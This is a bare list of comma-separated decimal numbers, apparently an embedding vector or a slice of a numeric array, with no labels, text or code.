-0.026701422408223152, 0.02280254103243351, -0.032106686383485794, -0.019258104264736176, -0.015669362619519234, -0.02408739924430847, -0.059398848563432693, -0.014310662634670734, 0.012833814136683941, -0.06291374564170837, -0.02529841661453247, 0.0121323112398386, 0.01043393462896347, -0.019331946969032288, -0.024279389530420303, 0.00365335401147604, -0.017249591648578644, -0.0022835771087557077, -0.014997396618127823, -0.03668491914868355, -0.03062983974814415, 0.008181740529835224, 0.04480758681893349, -0.011667103506624699, 0.0009239533683285117, 0.013299020938575268, 0.035030849277973175, 0.01413344033062458, 0.011851709336042404, -0.027735216543078423, -0.05263488367199898, -0.025342721492052078, 0.024781519547104836, 0.016215797513723373, -0.01903657801449299, -0.023068374022841454, 0.017515424638986588, -0.008418036624789238, 0.019007040187716484, 0.01964208483695984, 0.006531362887471914, -0.028665630146861076, 0.009016160853207111, -0.026524199172854424, 0.024412306025624275, 0.03299279510974884, -0.016998527571558952, 0.004928981885313988, -0.031072894111275673, -0.0021100472658872604, 0.017515424638986588, 0.02407263219356537, -0.026893412694334984, 0.017426813021302223, -0.014244204387068748, 0.0272921621799469, 0.019612548872828484, -0.046491190791130066, 0.025918692350387573, -0.006202763877809048, -0.02972896210849285, 0.026243599131703377, -0.009857963770627975, -0.041085924953222275, -0.021547220647335052, 0.009503520093858242, -0.0022189649753272533, -0.05015377700328827, -0.026494663208723068, 0.062263935804367065, -0.023363744840025902, -0.05177830904722214, 0.0012091697426512837, -0.033997055143117905, 0.027794290333986282, -0.049947019666433334, 0.03384936973452568, -0.008713406510651112, -0.019258104264736176, 0.09079664945602417, -0.016452092677354813, -0.01151941902935505, 0.03907741233706474, -0.0002533718361519277, 0.009370604529976845, -0.02317175455391407, -0.019435327500104904, 0.015270614065229893, 0.025859618559479713, 0.02407263219356537, 0.0021174317225813866, -0.003086613491177559, -0.00949613656848669, 0.03184085339307785, 0.010286250151693821, -0.021429073065519333, 0.012627054937183857, 0.04028842970728874, 0.0406428724527359, 0.017692646011710167, -0.018711671233177185, 0.0035112074110656977, 0.03051169030368328, 0.014753716997802258, -0.022152727469801903, -0.004836678970605135, 0.038486674427986145, 0.013387632556259632, -0.021576756611466408, -0.02510642632842064, -0.009119539521634579, 0.0022595783229917288, -0.01789940521121025, -0.02122231386601925, 0.018888892605900764, 0.019907917827367783, -0.02297976426780224, 0.0028964693192392588, 0.03420381247997284, -0.03736426681280136, -0.00919338222593069, -0.015063854865729809, -0.042976293712854385, -0.007506082765758038, -0.039579540491104126, 0.012966730631887913, -0.013631312176585197, -0.021192776039242744, -0.017087137326598167, -0.007878987118601799, -0.02323082834482193, -0.0022558860946446657, 0.021547220647335052, -0.0069264196790754795, -0.045280177146196365, 0.027912437915802002, -0.012036316096782684, -0.04465990141034126, -0.008543568663299084, 0.02990618348121643, -0.012420296669006348, -0.04087916761636734, 0.008816786110401154, -0.0046003833413124084, -0.05027192458510399, 0.008085745386779308, 0.015595520846545696, 0.008344193920493126, 0.006176919210702181, 0.028296418488025665, -0.0191104207187891, -0.02139953523874283, -0.04950396344065666, -0.05287117883563042, 0.030718449503183365, -0.0400521345436573, -0.009658589959144592, 0.01953870616853237, 0.009953958913683891, -0.00955521035939455, 0.009259840473532677, 0.0351785309612751, 0.018091395497322083, 0.004825602751225233, -0.0242646224796772, -0.011674487963318825, 0.019937455654144287, -0.016585009172558784, -0.0014186976477503777, 0.003442903282120824, 0.0012830122141167521, 0.012169231660664082, 0.03414473682641983, 0.055647652596235275, -0.0018248310079798102, -0.0006765812286175787, 0.008322041481733322, -0.0028355491813272238, -0.013136567547917366, -0.010182870551943779, -0.01856398582458496, 0.01893319934606552, 0.0020860484801232815, -0.014753716997802258, -0.02352619729936123, -0.02055773138999939, 0.00961428415030241, -0.030423080548644066, 0.013335942290723324, -0.02420554868876934, -0.009067850187420845, -0.013129184022545815, 0.006324604153633118, 0.009141692891716957, 0.007664843928068876, -0.021266618743538857, 0.0037844243925064802, 0.051276180893182755, 0.004035488702356815, 0.025623321533203125, 0.0134910112246871, -0.007210712879896164, -0.019125189632177353, 0.006439059507101774, -0.03414473682641983, 0.002710017142817378, -0.027277393266558647, 0.008838938549160957, -0.009924422018229961, 0.008565722033381462, 0.00961428415030241, 0.015373993664979935, -0.01464295294135809, 0.017884636297822, -0.01952393725514412, 0.027794290333986282, 0.0009553364361636341, 0.010625924915075302, -0.012523675337433815, 0.024456612765789032, -0.013380248099565506, 0.005767093505710363, -0.004844063427299261, -0.007177483756095171, -0.011940320953726768, 0.0032546049915254116, -0.003677352797240019, 0.01563982665538788, -0.025003045797348022, 0.017988014966249466, -0.024220315739512444, 0.0070297992788255215, 0.0212370827794075, -0.004031796474009752, 0.019021809101104736, -0.03680306673049927, 0.021975506097078323, -0.009008776396512985, 0.008115283213555813, -0.003304448677226901, -0.02432369627058506, 0.019080882892012596, -0.03709843382239342, -0.013232562690973282, 0.0031604559626430273, -0.0035075154155492783, 0.005379420705139637, 0.005582487676292658, -0.029463129118084908, -0.006756582297384739, 0.02219703420996666, 0.019996529445052147, -0.03650769591331482, -0.019686391577124596, 0.006560899782925844, -0.04507341608405113, 0.004965903237462044, 0.03373122215270996, 0.006202763877809048, -0.032845113426446915, -0.022462867200374603, 0.010840068571269512, 0.0033542923629283905, -0.01897750422358513, -0.01844583824276924, 0.015152466483414173, -0.02165059931576252, 0.0003569819964468479, 0.032549742609262466, -0.004777605179697275, -0.0036367394495755434, 0.021251849830150604, 0.026406051591038704, -0.024294158443808556, -0.023186521604657173, 0.019627317786216736, 0.01230953261256218, -0.008299889042973518, -0.025076888501644135, 0.0036791989114135504, -0.01801755279302597, -0.014923554845154285, -0.010286250151693821, 0.03252020478248596, -0.01631917618215084, -0.016393018886446953, 0.058808110654354095, 0.01261228695511818, -0.00045113108353689313, -0.0038878037594258785, -0.0024700292851775885, 0.02219703420996666, -0.029507433995604515, -0.002220811089500785, 0.0051948148757219315, -0.03680306673049927, -0.02348189242184162, 0.004707454703748226, 0.015757974237203598, 0.028650861233472824, 0.0017657571006566286, -0.011076363734900951, -0.006173226982355118, -0.014229435473680496, 0.0010384091874584556, 0.0021469686180353165, 0.017426813021302223, -0.005781861953437328, -0.033258628100156784, -0.012686128728091717, 0.045398324728012085, -0.009208151139318943, 0.008838938549160957, -0.02801581658422947, -0.004629920236766338, -0.0038065770640969276, -0.02481105551123619, 0.025918692350387573, -0.028178270906209946, 0.013276868499815464, -0.005516029428690672, 0.022699162364006042, 0.012996267527341843, 0.021030323579907417, -0.003799192840233445, -0.030039099976420403, 0.016333945095539093, 0.022610550746321678, 0.020395278930664062, -0.007328860927373171, 0.03559204936027527, 0.03585788235068321, -0.01103944331407547, -0.0068415007553994656, -0.021074628457427025, -0.02602207101881504, -0.005390497390180826, -0.01856398582458496, 0.009422293864190578, -0.004796065855771303, -0.0005935085355304182, -0.0024811055045574903, 0.020823564380407333, 0.004175789188593626, 0.015359224751591682, -0.029699424281716347, 0.019125189632177353, -0.010493009351193905, 0.0039062644354999065, -0.015551215037703514, -0.006553515326231718, 0.02637651562690735, -0.009850580245256424, 0.0045191566459834576, 0.04501434415578842, 0.0036404316779226065, -0.00022464251378551126, 0.027853364124894142, -0.019066113978624344, -0.005349883809685707, -0.003850882640108466, -0.0137937655672431, -0.04070194438099861, 0.0007776530692353845, -0.008203893899917603, -0.0037179661449044943, 0.007358397822827101, 0.030127709731459618, 0.014443579129874706, -0.01188863068819046, 0.015506910160183907, -0.0063836779445409775, -0.0025364872999489307, 0.01928764209151268, -0.0012442448642104864, 0.01006472297012806, -0.031131967902183533, 0.01764834113419056, -0.019568243995308876, 0.0257857758551836, -0.001773141324520111, 0.014620800502598286, -0.008203893899917603, -0.002473721280694008, -0.010278865694999695, 0.024338463321328163, -0.04519156739115715, 0.011681872420012951, -0.009030928835272789, -0.004578230436891317, -0.004449006170034409, 0.012073236517608166, 0.01352054812014103, -0.02473721280694008, 0.0024903358425945044, -0.007997134700417519, -0.024604296311736107, -0.024456612765789032, 0.007960213348269463, -0.008905396796762943, 0.016599778085947037, 0.00253094919025898, -0.018165236338973045, 0.016481630504131317, -0.047465912997722626, -0.03148641064763069, -0.00146392616443336, 0.020040834322571754, 0.030777523294091225, 0.011637566611170769, -0.004286552779376507, -0.01064807828515768, -0.010721920058131218, 0.009488752111792564, -0.021517682820558548, -0.0017205285839736462, -0.007915908470749855, -0.013335942290723324, -0.023304671049118042, -0.010352708399295807, 0.008285120129585266, 0.022418560460209846, -0.000344751839293167, 0.03352446109056473, 0.018401533365249634, 0.01618625968694687, 0.004803449846804142, -0.055470433086156845, -0.02055773138999939, -0.00332844746299088, 0.026908179745078087, -0.019612548872828484, 0.014192515052855015, -0.0014196207048371434, -0.00059904670342803, -0.002591869095340371, 0.004637304227799177, 0.014628184959292412, 0.041883423924446106, -0.0454869344830513, 0.03438103571534157, 0.01449526846408844, 0.02358527109026909, -0.0004024412191938609, -0.0068747298792004585, 0.00919338222593069, 0.0034687479492276907, -0.029743729159235954, 0.003980106674134731, 0.0035444365348666906, -0.012804277241230011, -0.001388237695209682, 0.03080706112086773, 0.02354096621274948, -0.03080706112086773, -0.00004234401785652153, -0.039697688072919846, -0.0056341770105063915, 0.00026837107725441456, 0.000411440763855353, 0.010367476381361485, 0.003884111763909459, 0.003994875121861696, -0.02008514106273651, 0.015861352905631065, -0.030009562149643898, 0.05030146241188049, -0.01953870616853237, -0.029079148545861244, -0.018180005252361298, -0.009481367655098438, 0.0056710983626544476, -0.05044914782047272, -0.02323082834482193, 0.028591787442564964, 0.0007458085310645401, 0.011120669543743134, -0.01722005382180214, -0.025638090446591377, -0.024043094366788864, 0.0012968576047569513, 0.03414473682641983, 0.0011168667115271091, 0.027912437915802002, -0.016422556713223457, -0.01673269458115101, 0.006682739593088627, 0.011334812268614769, 0.02674572728574276, 0.001498078228905797, -0.013033188879489899, -0.003295218339189887, 0.030895670875906944, 0.003994875121861696, -0.00473329983651638, 0.04076102003455162, 0.0020122062414884567, -0.046904709190130234, -0.019331946969032288, 0.003817653516307473, -0.005541874095797539, 0.004197942093014717, 0.016289640218019485, 0.0014168515335768461, -0.009200766682624817, 0.02377726137638092, -0.005907393991947174, -0.009902269579470158, 0.003943185787647963, 0.03246113285422325, -0.026524199172854424, -0.023097911849617958, -0.009429678320884705, 0.0472886897623539, -0.0034632098395377398, -0.0017666800413280725, -0.027203550562262535, -0.009422293864190578, 0.025209804996848106, -0.019848844036459923, 0.01343193743377924, 0.007886371575295925, -0.0053831129334867, 0.0006835039821453393, 0.01977500133216381, 0.016850842162966728, 0.015610288828611374, 0.016776999458670616, 0.0010116412304341793, -0.008329425938427448, -0.004408393055200577, 0.0068931905552744865, -0.002311267890036106, -0.011452960781753063, 0.02965511940419674, -0.004729607608169317, -0.0063836779445409775, -0.021931201219558716, 0.029817571863532066, -0.02354096621274948, -0.0056710983626544476, -0.03317001834511757, 0.02311268076300621, -0.016570240259170532, -0.014539574272930622, -0.010042570531368256, 0.018401533365249634, 0.014126056805253029, -0.01899227313697338, -0.024545222520828247, -0.0018202158389613032, 0.020823564380407333, 0.020040834322571754, 0.019494401291012764, -0.010803147219121456, -0.02814873307943344, -0.02918252721428871, -0.02590392343699932, 0.011320044286549091, -0.013468858785927296, -0.0030903054866939783, -0.03857528418302536, -0.037393804639577866, 0.01571366935968399, 0.027395540848374367, 0.0327564999461174, -0.026598041877150536, 0.018711671233177185, 0.02844410389661789, 0.014871864579617977, -0.0062655298970639706, -0.0076057701371610165, -0.011334812268614769, 0.004301321227103472, -0.01903657801449299, -0.01674746349453926, -0.003765963716432452, 0.000627660658210516, 0.007952829822897911, 0.0012100927997380495, 0.020912175998091698, 0.04702285677194595, -0.005608332343399525, 0.00574494106695056, 0.007738686632364988, -0.02196073718369007, 0.0005912009510211647, -0.03621232509613037, 0.00739901140332222, 0.024884898215532303, 0.02602207101881504, 0.028606556355953217, -0.0022503479849547148, 0.05871949717402458, 0.0019512861035764217, 0.040790557861328125, -0.015743205323815346, 0.007221789564937353, -0.004677917808294296, -0.03550343960523605, -0.02292068861424923, 0.00976196862757206, -0.008742943406105042, 0.007760839071124792, 0.0037844243925064802, -0.0051763541996479034, 0.021059859544038773, -0.004039180930703878, -0.020542962476611137, -0.02299453131854534, -0.0020140521228313446, -0.013882376253604889, -0.003289680229499936, -0.005911086220294237, -0.01903657801449299, 0.008166972547769547, 0.013498395681381226, -0.00781991332769394, -0.011807404458522797, 0.012804277241230011, 0.01905134692788124, -0.025874387472867966, -0.019007040187716484, 0.02098601870238781, 0.01085483655333519, 0.0050582061521708965, -0.037157509475946426, -0.01922856830060482, -0.014155593700706959, 0.0460776761174202, -0.027026329189538956, -0.018120931461453438, 0.005305578466504812, 0.024161241948604584, 0.023127447813749313, -0.0008847246062941849, 0.0021340460516512394, -0.018962735310196877, 0.004401008598506451, 0.024840593338012695, -0.032047614455223083, -0.0034078280441462994, -0.03243159502744675, 0.013668233528733253, 0.006516594439744949, -0.008469726890325546, 0.013911913149058819, 0.019021809101104736, -0.027395540848374367, 0.023806799203157425, 0.009717663750052452, -0.02850317768752575, 0.006494441535323858, -0.0007979597430676222, -0.0017491425387561321, -0.01401529274880886, 0.02777952142059803, -0.022034579887986183, 0.0058261677622795105, -0.0200112983584404, 0.023156985640525818, 0.02286161482334137, 0.0010836375877261162, 0.011283122934401035, -0.007694380823522806, 0.00818912498652935, 0.0230388380587101, -0.004903137218207121, 0.025638090446591377, 0.02972896210849285, 0.008211278356611729, -0.010950831696391106, 0.01006472297012806, -0.0275875311344862, -0.03414473682641983, -0.025076888501644135, 0.007960213348269463, -0.0115268025547266, -0.012819045223295689, 0.013188257813453674, 0.04232648015022278, 0.03470594063401222, -0.04347842186689377, 0.026184525340795517, -0.019494401291012764, 0.0022134268656373024, 0.003590587992221117, 0.007805144414305687, 0.005630485247820616, 0.00005670867540175095, -0.01376422867178917, -0.0036588923539966345, 0.04076102003455162, 0.029315443709492683, 0.013188257813453674, 0.02408739924430847, -0.02808965928852558, 0.0044637746177613735, 0.019199030473828316, 0.023762492462992668, -0.004844063427299261, -0.005386805161833763, 0.04173573851585388, 0.0027893977239727974, 0.024589529260993004, 0.010441319085657597, 0.030482154339551926, 0.022300412878394127, 0.009112155996263027, -0.02523934096097946, 0.03922509774565697, -0.029551738873124123, -0.02128138765692711, 0.0014085442526265979, 0.05301886424422264, -0.015388761647045612, -0.027011560276150703, 0.01636348105967045, -0.00210081716068089, 0.020277131348848343, 0.006210148334503174, -0.008875859901309013, 0.014502652920782566, 0.007731302175670862, 0.004190557636320591, 0.0002563716843724251, 0.052428122609853745, -0.0033745989203453064, 0.005342499818652868, -0.009725047275424004, -0.0009147230884991586, -0.012508907355368137, 0.0014371582074090838, -0.014849712140858173, 0.00662735803052783, -0.04536878690123558, 0.003485362511128187, -0.003836114192381501, -0.005582487676292658, 0.010049954056739807, 0.009289377368986607, 0.012767355889081955, 0.024116937071084976, 0.010138565674424171, 0.005999697372317314, 0.014628184959292412, -0.023363744840025902, -0.0032693734392523766, 0.01710190623998642, -0.01745634898543358, 0.012819045223295689, 0.009422293864190578, -0.016112416982650757, -0.020158981904387474, -0.03913648799061775, -0.00946659967303276, 0.015861352905631065, 0.01446573156863451, -0.02342281863093376, -0.02364434488117695, 0.01519677136093378, -0.005527105648070574, 0.007051951717585325, -0.009636436589062214, -0.0148570965975523, -0.023821566253900528, -0.02529841661453247, -0.011083748191595078, -0.010042570531368256, -0.03045261651277542, 0.005216967314481735, 0.07319261133670807, 0.00042482471326366067, -0.025697164237499237, 0.028252113610506058, 0.009045697748661041, 0.021990275010466576, -0.017973246052861214, 0.004906829446554184, -0.009665973484516144, 0.005962776020169258, 0.0037161202635616064, -0.005375728942453861, 0.01899227313697338, 0.009156460873782635, -0.01880028285086155, 0.0050249770283699036, -0.0076057701371610165, -0.016038576140999794, -0.013476243242621422, -0.022034579887986183, 0.02159152552485466, -0.007387934718281031, 0.03402658924460411, -0.01946486346423626, 0.023216059431433678, -0.019627317786216736, -0.027986280620098114, -0.012213537469506264, -0.033997055143117905, -0.012841198593378067, -0.013860223814845085, -0.01838676445186138, -0.011364349164068699, -0.004316089674830437, 0.01843106932938099, -0.0060661556199193, 0.014849712140858173, -0.0051948148757219315, 0.007967597804963589, -0.020956480875611305, 0.00018345228454563767, -0.03234298154711723, -0.014672490768134594, -0.01148988213390112, 0.0011768636759370565, -0.020232824608683586, 0.020528195425868034, 0.021517682820558548, 0.0015829970361664891, -0.004751760046929121, 0.004836678970605135, -0.014650337398052216, 0.022846847772598267, 0.018475376069545746, -0.011209280230104923, 0.0031659940723329782, -0.00023906485876068473, -0.01121666468679905, 0.01264182385057211, -0.02438277006149292, 0.003129072953015566, -0.019730696454644203, 0.031102430075407028, -0.003448441391810775, 0.009629052132368088, -0.008779864758253098, -0.03281557559967041, -0.0035924341063946486, 0.009909654036164284, 0.005907393991947174, 0.015625057741999626, 0.006191687658429146, 0.010544698685407639, 0.003346908139064908, -0.008277736604213715, 0.0062470692209899426, 0.002848471747711301, 0.016112416982650757, 0.007155331317335367, -0.013505780138075352, 0.015373993664979935, 0.04841109737753868, -0.009112155996263027, 0.012841198593378067, -0.02541656419634819, 0.040849629789590836, -0.01180002000182867, 0.023452354595065117, -0.03125011548399925, -0.029920952394604683, -0.01416297722607851, -0.00003389252015040256, 0.0013826994691044092, 0.020838333293795586, 0.006088308058679104, 0.016097649931907654, 0.009429678320884705, 0.010847453027963638, 0.0030607685912400484, -0.0025291030760854483, 0.007439624518156052, -0.007960213348269463, 0.021753979846835136, -0.017736950889229774, 0.01230953261256218, -0.014812790788710117, 0.006498133763670921, 0.01171140931546688, -0.010478240437805653, -0.011512034572660923, -0.0269820224493742, -0.009437061846256256, 0.002844779519364238, -0.0303344689309597, -0.01782556250691414, -0.006664278917014599, -0.01236860640347004, 0.004452698398381472, -0.007026107050478458, -0.02766137383878231, -0.013587006367743015, -0.01844583824276924, 0.03712797164916992, -0.03479455038905144, 0.004220094531774521, 0.0009950266685336828, 0.0034502875059843063, -0.017988014966249466, -0.013380248099565506, 0.020454352721571922, 0.021015554666519165, 0.016481630504131317, 0.027764752507209778, -0.007620538584887981, 0.02803058549761772, -0.018002783879637718, 0.028414566069841385, -0.012508907355368137, -0.004659457132220268, -0.01428851019591093, -0.007339937146753073, 0.021945970132946968, 0.016289640218019485, 0.020040834322571754, 0.008004519157111645, -0.007325168699026108, 0.0017851407174021006, -0.023127447813749313, 0.02795674279332161, 0.0075540803372859955, -0.01624533347785473, -0.018165236338973045, 0.02401355654001236, 0.02977326698601246, -0.0031918389722704887, -0.0026564812287688255, 0.012383375316858292, -0.01488663349300623, -0.0031696863006800413, -0.012678745202720165, 0.0023186521138995886, 0.010670230723917484, 0.014812790788710117, 0.00872817449271679, 0.02231518179178238, 0.010337939485907555, 0.012065852992236614, -0.02693771757185459, -0.019922686740756035, -0.02504735067486763, 0.025490406900644302, 0.0058077070862054825, -0.018608292564749718, -0.007373166270554066, 0.0376005657017231, -0.001654993393458426, -0.0002932928910013288, 0.010020417161285877, 0.01519677136093378, 0.0022281953133642673, -0.002863240195438266, 0.01661454699933529, -0.015935195609927177, -0.004245939664542675, 0.02256624586880207, -0.02789766900241375, 0.028650861233472824, 0.008765095844864845, -0.03730519488453865, -0.0044785430654883385, 0.003666276577860117, 0.02323082834482193, -0.025933461263775826, -0.03234298154711723, -0.013978371396660805, -0.020410047844052315, 0.002145122503861785, -0.014111287891864777, -0.012206153012812138, -0.007506082765758038, 0.005220659542828798, -0.00458192266523838, 0.012486754916608334, 0.021694906055927277, 0.015314919874072075, -0.015964733436703682, 0.0029444668907672167, 0.02687864378094673, -0.0032102996483445168, 0.019331946969032288, -0.012767355889081955, -0.010441319085657597, 0.0023168062325567007, 0.02049865759909153, 0.028901925310492516, 0.0018386763986200094, -0.0028853928670287132, -0.041824351996183395, 0.002067588036879897, -0.004936366342008114, -0.025209804996848106, 0.02590392343699932, 0.0008205740014091134, 0.0001407621311955154, -0.02748415246605873, 0.014487884007394314, 0.023939715698361397, -0.0036736608017235994, -0.036300938576459885, -0.0075208512134850025, -0.004175789188593626, -0.0028078584000468254, -0.020882638171315193, 0.018519680947065353, -0.010308402590453625, 0.002440492156893015, 0.046727489680051804, -0.012420296669006348, 0.03002433106303215, -0.0026214062236249447, 0.014657721854746342, -0.02972896210849285, -0.010360092855989933, 0.006291375029832125, 0.007967597804963589, -0.00027737062191590667, 0.031515948474407196, 0.01958301104605198, -0.01952393725514412, 0.013867608271539211, -0.015004781074821949, -0.005501260980963707, -0.005168969742953777, -0.019243337213993073, -0.015086008235812187, 0.018165236338973045, -0.016909915953874588, 0.003651508130133152, 0.012501522898674011, -0.034528717398643494, 0.019125189632177353, -0.025800544768571854, -0.00250141229480505, 0.00010043723887065426, -0.03080706112086773, 0.02856225147843361, -0.02201981283724308, -0.02225610800087452, -0.02553471177816391, -0.00955521035939455, 0.01519677136093378, -0.004596691112965345, -0.009200766682624817, 0.0056341770105063915, -0.004777605179697275, -0.015093391761183739, 0.011430807411670685, -0.0011584031162783504, -0.013535317033529282, -0.013121799565851688, -0.007760839071124792, 0.050183314830064774, -0.004903137218207121, -0.016968989744782448, -0.023142216727137566, -0.023142216727137566, -0.007930676452815533, -0.015373993664979935, 0.0051431250758469105, 0.011475113220512867, 0.00837373174726963, -0.016850842162966728, 0.010057338513433933, -0.02978803589940071, 0.010810531675815582, -0.025135962292551994, -0.016939453780651093, 0.030777523294091225, -0.00007799606100888923, 0.003950569778680801, 0.009592131711542606, 0.023673882707953453, 0.02928590588271618, -0.009710279293358326, -0.007251326460391283, 0.005874165333807468, -0.018268616870045662, -0.013668233528733253, 0.025150731205940247, -0.020277131348848343, 0.005519721657037735, -0.017796024680137634, -0.027927206829190254, -0.029935719445347786, 0.0160828810185194, -0.0016854534624144435, 0.002272500656545162, -0.006376293487846851, -0.02487012930214405, 0.0057634012773633, 0.00028844698681496084, 0.0075910016894340515, -0.02231518179178238, 0.018696902319788933, 0.024116937071084976, 0.004652073141187429, 0.006128921639174223, 0.00550495320931077, -0.020055603235960007, 0.01745634898543358, 0.014111287891864777, 0.024914434179663658, 0.024028325453400612, -0.01040439773350954, 0.002482951618731022, 0.001202708575874567, -0.00961428415030241, 0.005992312915623188, 0.009629052132368088, 0.001859906129539013, -0.026538968086242676, 0.024766750633716583, 0.0001990284217754379, 0.014591263607144356, 0.018401533365249634, -0.01661454699933529, 0.0008385730907320976, 0.002942620776593685, -0.0009774891659617424, -0.00012160924961790442, -0.012051084078848362, -0.004877292551100254, -0.0064464439637959, -0.015565983951091766, 0.03355399891734123, 0.022817309945821762, 0.0044637746177613735, 0.03142733871936798, 0.017722181975841522, -0.05053775757551193, -0.01431804709136486, 0.003551820758730173, 0.01825384795665741, -0.005460647400468588, 0.004323474131524563, -0.0004589768359437585, -0.02893146313726902, -0.012833814136683941, -0.03588742017745972, 0.02918252721428871, 0.00035005927202291787, -0.012375990860164165, -0.003171532182022929, 0.02178351581096649, 0.011785251088440418, 0.026406051591038704, 0.023762492462992668, -0.0194057896733284, -0.01838676445186138, 0.02602207101881504, -0.007081488613039255, 0.0038028850685805082, -0.014354967512190342, 0.008713406510651112, -0.029492665082216263, -0.00021033553639426827, -0.010980368591845036, 0.005460647400468588, -0.010832684114575386, -0.014369736425578594, -0.0016780691221356392, 0.014214667491614819, -0.007960213348269463, 0.02297976426780224, 0.010249328799545765, -0.01115759089589119, 0.021458609029650688, 0.015728436410427094, -0.011785251088440418, -0.002776475390419364, 0.01594996452331543, 0.020454352721571922, 0.014480500482022762, 0.02024759352207184, -0.006084615830332041, 0.017751719802618027, -0.033140480518341064, 0.0013097800547257066, 0.03080706112086773, -0.013129184022545815, 0.0044305454939603806, -0.014236819930374622, 0.021665368229150772, -0.010197639465332031, -0.026154987514019012, -0.02457476034760475, -0.023570502176880836, 0.033022332936525345, -0.014251588843762875, -0.010013033635914326, 0.0029444668907672167, -0.005641561467200518, -0.03494223579764366, -0.03479455038905144, 0.008181740529835224, -0.005630485247820616, 0.002671249909326434, -0.029980026185512543, -0.019154725596308708, 0.008986623026430607, -0.0045006959699094296, 0.007546695880591869, 0.023127447813749313, -0.015034317970275879, -0.014650337398052216, -0.001440850319340825, -0.006191687658429146, -0.00021471994114108384, 0.006202763877809048, 0.003998567350208759, 0.015004781074821949, 0.011999394744634628, 0.0036127406638115644, 0.004844063427299261, -0.004869908094406128, -0.0020472812466323376, -0.002800474176183343, -0.008920165710151196, -0.023393280804157257, -0.014244204387068748, 0.03195900097489357, 0.012789508327841759, 0.00837373174726963, 0.020897407084703445, 0.010773610323667526, -0.02572670206427574, 0.01983407698571682, 0.029492665082216263, -0.007952829822897911, -0.005335115361958742, 0.011054211296141148, -0.026538968086242676, 0.006479673087596893, -0.011615414172410965, 0.000008559663911000825, 0.0017149903578683734, 0.010670230723917484, 0.0004841294139623642, -0.004751760046929121, -0.03621232509613037, 0.016525935381650925, 0.017264358699321747, -0.0008173433598130941, -0.028119197115302086, 0.020956480875611305, -0.002996156457811594, -0.00837373174726963, -0.0097028948366642, 0.02086786925792694, -0.0038213457446545362, 0.008787249214947224, 0.0007342706667259336, 0.006357832811772823, -0.002634328557178378, -0.006642126478254795, 0.012390759773552418, -0.008477110415697098, 0.016644082963466644, 0.007635307032614946, 0.010596388019621372, -0.006804579868912697, -0.015041702426970005, -0.0063467565923929214, 0.004382547922432423, -0.00458192266523838, 0.019966991618275642, -0.00390995666384697, 0.020395278930664062, 0.020661111921072006, 0.013513164594769478, -0.010234560817480087, -0.016274871304631233, -0.007746070623397827, -0.03827991336584091, 0.020232824608683586, -0.012944577261805534, -0.008735558949410915, 0.023614808917045593, 0.00269155646674335, -0.002126661827787757, -0.021369999274611473, -0.01965685375034809, -0.0010910218115895987, -0.01261228695511818, 0.00955521035939455, 0.011534187011420727, -0.004914213437587023, -0.0007476545870304108, -0.021429073065519333, -0.008203893899917603, 0.009333683177828789, 0.001317164278589189, -0.0062950667925179005, -0.03160455822944641, -0.005999697372317314, 0.015698900446295738, -0.010773610323667526, 0.011305275373160839, -0.02334897592663765, -0.00040359501144848764, 0.0051468173041939735, 0.008322041481733322, -0.011327428743243217, -0.028414566069841385, 0.002150660613551736, 0.008477110415697098, 0.004072410054504871, 0.0008676485158503056, 0.004666841588914394, -0.004227478988468647, 0.01264182385057211, 0.008203893899917603, 0.020853102207183838, 0.029374517500400543, -0.009629052132368088, -0.01307010930031538, -0.0017796024912968278, -0.010101644322276115, -0.005759709514677525, -0.010574235580861568, -0.0019679006654769182, -0.006985493469983339, -0.02255147695541382, -0.011704024858772755, 0.017604034394025803, 0.00351859163492918, -0.024722443893551826, -0.01795847900211811, -0.0028872389812022448, 0.000051112805522279814, -0.0007771915406920016, 0.0036459697876125574, 0.024161241948604584, 0.0040059518069028854, 0.009459215216338634, -0.0029444668907672167, -0.0016236103838309646, 0.027425076812505722, -0.006575668230652809, -0.010581620037555695, 0.003666276577860117, -0.0017676030984148383, 0.008979239501059055, 0.022699162364006042, -0.010182870551943779, -0.0032029151916503906, -0.007679612375795841, -0.015935195609927177, 0.0031918389722704887, 0.010323171503841877, 0.026125451549887657, 0.012449833564460278, -0.011135438457131386, -0.01009425986558199, -0.00407979404553771, -0.013136567547917366, 0.011755714192986488, -0.00964382104575634, -0.012501522898674011, -0.015462604351341724, -0.005239120218902826, 0.006302451249212027, -0.006752890069037676, -0.022211803123354912, -0.0076426914893090725, 0.0008791863801889122, -0.007170099765062332, -0.013897145166993141, 0.001232245471328497, 0.0327564999461174, -0.012324301525950432, 0.025874387472867966, -0.007151639088988304, 0.0006821193965151906, 0.007221789564937353, -0.011231433600187302, 0.035326216369867325, -0.011696640402078629, -0.008122666738927364, -0.013919297605752945, 0.006010773591697216, -0.026760496199131012, 0.003280449891462922, -0.0003452133387327194, -0.013513164594769478, 0.009230303578078747, 0.005822475533932447, 0.01819477416574955, -0.002497720066457987, -0.041588056832551956, -0.0016771461814641953, 0.009134308435022831, -0.0021561989560723305, 0.0001871443964773789, -0.007033491041511297, 0.014502652920782566, -0.0016725310124456882, -0.004072410054504871, -0.002078664256259799, -0.004648380912840366, -0.005475415848195553, 0.003363522468134761, 0.002824472961947322, 0.007184868212789297, -0.0131956422701478, 0.0057744779624044895, -0.005084051284939051, -0.0034318268299102783, -0.010175486095249653, -0.008772480301558971, -0.017264358699321747, 0.000803497910965234, -0.013882376253604889, -0.00671596871688962, -0.011896015144884586, -0.007258710451424122, -0.006457520183175802, 0.0018866739701479673, 0.008093129843473434, 0.0025420256424695253, 0.027336467057466507, 0.020454352721571922, -0.003195530967786908, 0.0028595479670912027, -0.008661717176437378, -0.024530453607439995, -0.01491617038846016, -0.0014371582074090838, 0.002458952832967043, 0.002372188027948141, 0.005372036714106798, 0.016776999458670616, 0.001021794625557959, 0.019361484795808792, 0.010145949199795723, -0.011283122934401035, -0.01355008501559496, 0.009894885122776031, 0.015580751933157444, 0.007495006546378136, -0.0007951906300149858, 0.017382508143782616, -0.012531059794127941, 0.003861958859488368, 0.003285988001152873, 0.0037585794925689697, -0.012383375316858292, -0.009629052132368088, -0.01479802280664444, -0.0006382754654623568, 0.020114677026867867, -0.010079490952193737, 0.007709149271249771, -0.01801755279302597, 0.008536184206604958, -0.004700070712715387, -0.012331685051321983, 0.008602642454206944, 0.015115545131266117, 0.0001708759955363348, 0.00573386438190937, -0.010079490952193737, 0.02408739924430847, 0.007376858498901129, -0.013025804422795773, -0.03689167648553848, 0.0039247251115739346, 0.006642126478254795, -0.011460344307124615, 0.014096518978476524, -0.01307010930031538, 0.019981760531663895, -0.018342459574341774, 0.008514031767845154, -0.029876645654439926, -0.00020595114619936794, 0.01491617038846016, 